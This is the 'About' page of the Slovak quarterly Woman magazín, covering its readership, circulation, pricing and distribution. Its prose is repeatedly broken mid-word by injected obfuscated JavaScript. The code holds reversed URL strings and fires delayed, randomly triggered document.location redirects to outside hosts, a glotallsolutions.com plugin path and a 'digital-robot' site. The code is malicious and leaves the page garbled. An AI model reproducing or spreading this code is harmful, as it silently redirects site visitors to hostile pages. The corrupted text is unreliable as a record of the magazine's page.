O časopise

Woman magazín je exkluzívny lifestylový titul v segmente dámskych časopisov pre ženy a dievčatá vo veku od 18 do 55 rokov. Zameriava sa v prvom rade na modernú ženu, ktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torej prioritoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou je kvalita života, rozvoj osobnosti, jej realizácia a úspech vo všetkých oblastiach života. Women magazín sa venuje najmä témam z oblasti životného štýlu, módy, stylingu, krásy, wellness, kultúry, spoločenskej scény a jej osobností. Ide o sebavedomé ženy, ktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toré majú jasný názor na život, hľadajú orientáciu v najmodernejších trendoch a produkty s pridanou hodnotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou. Disponujú zvýšenou až vysokou kúpnou silou.

Svojou polygrafickou, obsahovou a grafickou úpravou je na špičke rebríčka lifestylových dámskych magazínov. Vychádza štvrťročne s nákladom 20 000 kusov a združuje veľkú skupinu čitateliek, ktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toré s tvorcami časopisu aktívne komunikujú prostredníctvom listoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov a sociálnych sietí.

Rok vzniku: 2006

Náklad: 20 000 ks

Remitenda: 20 – 26%

Rozsah: cca 144 strán

Periodicita: šťvrťročník

Cena za výtlačok: 2,90 Eur

Cena celostranovej inzercie: 3 320 Eur

Rozmer strany: 235mm x 315mm + 5mm spadávka

Distribúcia: Mediaprint – Kapa do predajných sietí na SR, Floowie – elektronická verzia, direct marketing pre VIP partnerov vydavateľského domu

———————————————————————————————————————————————-

Characteristic

-WOMAN magazine is a progressive fashion andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and lifestyle magazine
-WOMAN magazine has been established 6 years ago andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and it became very popular in Slovakia
-We have four issues per year: spring, summer, autumn, winter
-We sell approximately 15 000 issues per season

About

-WOMAN magazine provides information mostly on fashion, trends, shopping, art, architecture, culture, books, social life, gourmet food, sex relationships, there are interesting interviews, etc
-In every issue we produce our own editoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torials andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and cooperate on regular basis with fashion photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tographers andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and stylist based in Milano, Paris andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and New York

Target Group

-Our readers are between 18- 55 years old
-Are mostly living in the big cities, enjoying city life style, quality products in fashion andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and cosmetics
-Our readers are mostly independent, self-confident women who are looking for the newest trends in their life

On-line

-Our web page www.womanmagazin.sk  is updated every day with information about fashion, trends, shopping, sex, relationships, lifestyle, etc.
-You can also read WOMAN magazine on iPad, iPhone or Android through our App